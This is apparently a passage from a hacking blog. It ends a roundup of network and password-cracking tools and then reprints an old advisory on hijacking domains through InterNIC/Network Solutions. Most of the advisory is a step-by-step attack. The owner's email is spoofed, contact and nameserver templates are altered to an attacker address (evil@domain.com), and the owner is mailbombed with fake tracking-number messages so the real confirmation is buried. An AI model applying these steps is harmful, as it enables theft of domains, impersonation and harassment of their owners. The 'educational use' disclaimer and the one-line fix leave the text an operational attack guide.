Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

• Verify that your network is set up the way you intended.
• Find locations with poor coverage in your WLAN.
• Detect other networks that may be causing interference on your network.
• Detect unauthorized “rogue” access points in your workplace.
• Help aim directional antennas for long-haul WLAN links.
• Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

Domain Stealing or How to Hijack a Domain

Please note this is an old technique again, just for learning purposes, learn how the old techniques worked and why they worked, then try and discover new ways to do things.

Summary

The sole purpose of the information contained in this advisory is to point out the flaws in InterNIC’s domain name handling system and is intended for educational use only. Since this is public knowledge, it should be also in everyone’s reach.

The technique described below involves an easy to follow procedure of stealing .com/.net/.org/.gov/.mil domain names.

This vulnerability has been publicly known for quite a while, and there are ways to prevent it. The procedure below enables an attacker to take over a domain name, enabling him or her to make the arbitrary web address (www.example.com) point to any desired web page on the Internet. This method of domain hijacking is constantly being used to hijack domain names, and to deface web sites.

THIS DOCUMENT SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY.

Details

Required ingredients:

• Anonymous remailer or mail bomber that can spoof email addresses.
  
• Social Engineering skills for timing the emails.
  
• A fake email address at hotmail.com or any other free service.
  

Exploit:
As an example for this advisory, we will take the domain name example.org. Go to http://www.networksolutions.com and click on the link that says ‘Who Is.’ Now enter the domain name (example.org in this case) in the search field and click on the ‘Search’ button. This would show you the WhoIs information, which will be similar to the one shown below:

Registrant:
Example (ex24-DOM)
Address details

Domain Name: EXAMPLE.ORG

Administrative Contact, Technical Contact, Zone Contact,
Billing Contact:
  DOMAIN, ADMIN (ADM001) ADMINEMAIL@EXAMPLE.COM

Record last updated on 00-Jan-2000.
Record created on 00-Jan-2000.
Database last updated on 3-Feb-2000 14:29:53 EST.

Domain servers in listed order:

NS1.EXAMPLE.COM 1.2.3.4
NS2.EXAMPLE.NET 1.2.3.5

Now you have two choices:
1) Either you could take full control of the domain by changing the Administrator’s handle information.
Or
2) You could simply point the domain to another host and let it recover in time by itself.

Initiating the First Attack:
Let us first explain the InterNIC authentication system in case most of you would be the readers who do not have their own domain names. The problem with InterNIC authentication is that they do NOT send a confirmation email if the request is sent from the same email as the person owning the contact or the domain name itself! Therefore, utilizing this flaw one could spoof anyone’s email address and change any domain name’s information.
Although, a confirmation is required from the person to whom the domain is about to be transferred; and that shouldn’t be too hard as it would your own email address.

Here’s a step-by-step procedure:

• Go to http://www.networksolutions.com/
  
• Click on the link that says ‘Make Changes.’
  
• Enter the domain name example.org
  
• You should be presented with 2 blue buttons
  
• Click on the one that says *Expert*
  
• Next screen would have a heading ‘Select the form that meets your needs’
  
• Click on the link that say ‘Contact Form’
  
• Next you should see a form with 2 fields.
  
• In the first field enter the admin’s handle (example.org admin is ADM001)
  
• In the next field enter his/her email address (in this case it’s ADMINEMAIL@EXAMPLE.COM)
  
• Change the option to ‘Modify.’
  
• Now ‘Proceed to Contact Information.’
  
• Select the MAIL-FROM option and click the ‘Go on to Contact Data Information.’
  
• Now you should see all the information about the admin contact of domain name!
  
• In the E-mail address field change the email to your own fake email. (in this case it’s evil@domain.com)
  
• Now ‘Proceed to Set Authorization Scheme.’
  
• Again choose MAIL-FROM and enter the email address of the admin (ADMINEMAIL@EXAMPLE.COM)
  
• Leave the bottom option to ‘No’ and ‘Generate Contact Form.’
  

Now you should see a template with all the information. Similar to this:

******** Please DO NOT REMOVE Version Number ********

Contact Version Number: 1.0

******** Please see attached detailed instructions ********

Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:

Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com

Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE

Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO

NOTE: Do NOT press the button at the bottom that says ‘Mail this contact form to me!’

Copy and paste this message into your anonymous remailer or mailbomber and you are ready to go; but WAIT! It’s not that easy, now comes the HARD part! When you mail this message to hostmaster@networksolutions.com a message similar to the following would be sent to the admin email address:

Subject: [NIC-000128.4r50] Your Mail
______________________________________________________________
This is an automatic reply to acknowledge that your message has been received by
hostmaster@networksolutions.com. This acknowledgement is "NOT" a confirmation that your request
has been processed. You will be notified when it has been completed.

If you should have need to correspond with us regarding this request, please include the
tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply
to this message.

If you have not already done so, please come and visit our site via www browser or ftp and
pick-up the latest domain template or review the Domain Name Registration Service Agreement at
the URL's:

Domain Name Registration Service Agreement
  http://www.networksolutions.com/legal/service-agreement.html
Domain Name Registration Template
  ftp://www.networksolutions.com/templates/domain-template.txt

Regards,
Network Solutions Registration Services

***********************************************

***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service Agreement,
Version 6.0. All versions of the Service Agreement template will continue
to be accepted and processed until January 31, 2000. On and after
February 1, 2000, please use the Network Solutions Service Agreement,
Version 6.0 template located atftp://www.networksolutions.com/templates/domain-template.txt
for all template requests.

The terms and conditions of the Service Agreement are available on our Web site at:
http://www.networksolutions.com/legal/service-agreement.html.
************************************************

The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at
5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times
will be included in that 12-hour zone file update and will normally begin to take effect within
5-6 hours.

Should you wish to modify or delete an existing domain name registration, you can do so online,
using our Service Agreement. You can change the registrant's address, replace a contact/agent
with a different contact/agent, or change primary and/or secondary name server information.

To update information about an existing contact, such as postal address, e-mail address or
telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is
available on our Web site at www.networksolutions.com

To register or update information about a name server, complete and submit the Host Form to
hostmaster@internic.net. This form is also available on our Web site.

Network Solutions Registration Services
e-mail: help@networksolutions.com

You should now be thinking that this message could get you in trouble but there is a way of getting rid of this trouble. Here you’ll use your mailbomber to mailbomb the guy with 20-30 similar messages if you want your attack to be successful. The person would see 35 messages from the same address and therefore would delete all of them and you’d probably be safe. If he ‘would’ email someone then he would probably reply to the wrong tracking number. In the above case, the tracking number is [NIC-000128.4r50]. OK, here another hard part. You have to open your notepad and generate similar numbers actually come up with them.

You should NEVER mailbomb the person with the same tracking number. What we mean

is that you should never send more than one emails to him from [NIC-000128.4r50] in the next email, change the [NIC-000128.4r50] to [NIC-000127.5089] or something different. Here is a list of some numbers that we generated just to give you a good idea of how the scheme works.

[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]

Remember to change the number at both places. In the subject as well as the email body!

In the case of example.org you will send the email messages to ADMINEMAIL@EXAMPLE.COM from hostmaster@internic.net. The message subject and body are already described above.

Stop after you have mailed him/her 10-15 messages! Now it’s time to email hostmaster@networksolutions.com with our fake email as ADMINEMAIL@EXAMPLE.COM So again, in this case the message will be sent to hostmaster@networksolutions.com from ADMINEMAIL@EXAMPLE.COM with the following template that we created above:

******** Please DO NOT REMOVE Version Number ********

Contact Version Number: 1.0

******** Please see attached detailed instructions ********

Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:

Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com

Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE

Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO

NOTE: Do NOT put anything in the Subject!

Just send one email! DO NOT bomb hostmaster@networksolutions.com with more than one email. That’s pretty much it. Now continue to bomb ADMINEMAIL@EXAMPLE.COM, changing the tracking number every time until your 30-35 tracking numbers are used up!

Now all you have to do is wait. After 24 hours you could go and change the domain information and no one would be there to stop you because now you are the admin of the domain name!

NOTE: This attack will only work on domains that have an admin contact different from their technical contact!

Initiating the Second Attack:

This attack will be successful even if the technical and admin contact are the same. The procedure is basically the same apart from the fact that this time:

• Go to http://www.networksolutions.com/
  
• Click on the link that says ‘Make Changes.’
  
• Enter the domain name example.org
  
• You should be presented with 2 blue buttons
  
• Click on the one that says *Expert*
  
• Next screen would have a heading ‘Select the form that meets your needs’
  
• Click on the link that say ‘Service Agreement.’
  
• Now when it asks for email address, enter your own.
  
• Now you should see many fields, don’t panic!
  
• Go to the technical contact and change the handle to freeservers, hypermart e.t.c.
  
• Now come to ‘Nameserver Information.’
  
• Change the nameservers to hypermart or freeserver nameservers.
  
• If there’s anything in the ‘Optional Information’ after that then simply delete them.
  
• Click on the button ‘Submit this form for processing.’
  

You are done, the form will be emailed to your email address. When the form arrives in your email, then simply take this part:

**** PLEASE DO NOT REMOVE Version Number or any of the information below when submitting this
template to hostmaster@networksolutions.com. *****

Domain Version Number: 5.0

******** Email completed agreement to hostmaster@networksolutions.com ********

AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s) through our online
application process or by applying for and registering a domain name as part of our e-mail
template application process or by using the service(s) provided by Network Solutions under the
Service Agreement, Version 5.0, you acknowledge that you have read and agree to be bound by all
terms and conditions of this Agreement and any pertinent rules or policies that are or may be
published by Network Solutions.

Please find the Network Solutions Service Agreement, Version 5.0 located at the URL
href="http://www.networksolutions.com/legal/service-agreement.html">
http://www.networksolutions.com/legal/service-agreement.html.

[ URL ftp://www.networksolutions.com ] [11/99]

Authorization
0a. (N)ew (M)odify (D)elete.........: M Name Registration
0b. Auth Scheme.....................: MAIL-FROM
0c. Auth Info.......................:

1. Comments........................:

2. Complete Domain Name............: example.org

Organization Using Domain Name
3a. Organization Name................: EXAMPLE
3b. Street Address..................:
3c. City............................:
3d. State...........................:
3e. Postal Code.....................:
3f. Country.........................:

Administrative Contact
4a. NIC Handle (if known)...........: ADM001
4b. (I)ndividual (R)ole?............: Individual
4c. Name (Last, First)..............:
4d. Organization Name...............:
4e. Street Address..................:
4f. City............................:
4g. State...........................:
4h. Postal Code.....................:
4i. Country.........................:
4j. Phone Number....................:
4k. Fax Number......................:
4l. E-Mailbox.......................:

Technical Contact
5a. NIC Handle (if known)...........: BDM002
5b. (I)ndividual (R)ole?............: Individual
5c. Name(Last, First)...............:
5d. Organization Name...............:
5e. Street Address..................:
5f. City............................:
5g. State...........................:
5h. Postal Code.....................:
5i. Country.........................:
5j. Phone Number....................:
5k. Fax Number......................:
5l. E-Mailbox.......................:

Billing Contact
6a. NIC Handle (if known)...........: ADM001
6b. (I)ndividual (R)ole?............: Individual
6c. Name (Last, First)..............:
6d. Organization Name...............:
6e. Street Address..................:
6f. City............................:
6g. State...........................:
6h. Postal Code.....................:
6i. Country.........................:
6j. Phone Number....................:
6k. Fax Number......................:
6l. E-Mailbox.......................:

Prime Name Server
7a. Primary Server Hostname.........: NS1.EXAMPLE.COM
7b. Primary Server Netaddress.......: 1.2.3.4

Secondary Name Server(s)
8a. Secondary Server Hostname.......: NS2.EXAMPLE.NET
8b. Secondary Server Netaddress.....: 1.2.3.5

END OF AGREEMENT

For instructions, please refer to:
"http://www.networksolutions.com/help/inst-mod.html"

Now launch your anonymous remailer or mailbomber.

• From: the domain admin (ADMINEMAIL@EXAMPLE.COM in this case).
  
• To: hostmaster@networksolutions.com
  
• Subject: (do not enter any subject, leave the field blank!)
  
• Body: the template you created above.
  
• You are ready to go but before you send this email to InterNIC, remember to bomb ADMINEMAIL@EXAMPLE.COM with similar emails but different tracking numbers as we did in the first procedure.
  
• After sending 10-20 emails, send the above template to InterNIC.
  
• Continue bombing your 40 messages. Remember to generate 40-50 tracking numbers.
  
  This is basically it.
  
• The domain would be transferred to freeservers or hypermart and then you could simply activate it from there on your own email address. Remember to use a fake email.

Nameservers and Handles:

Freeservers Technical Handle: FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154
Hypermart Technical Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66
______________________________________________________________

Possible Fixes:
Enable the CRYPT-FW password mechanism. This should prevent anyone without this password from changing your domain information (see the Internic contact form for more information).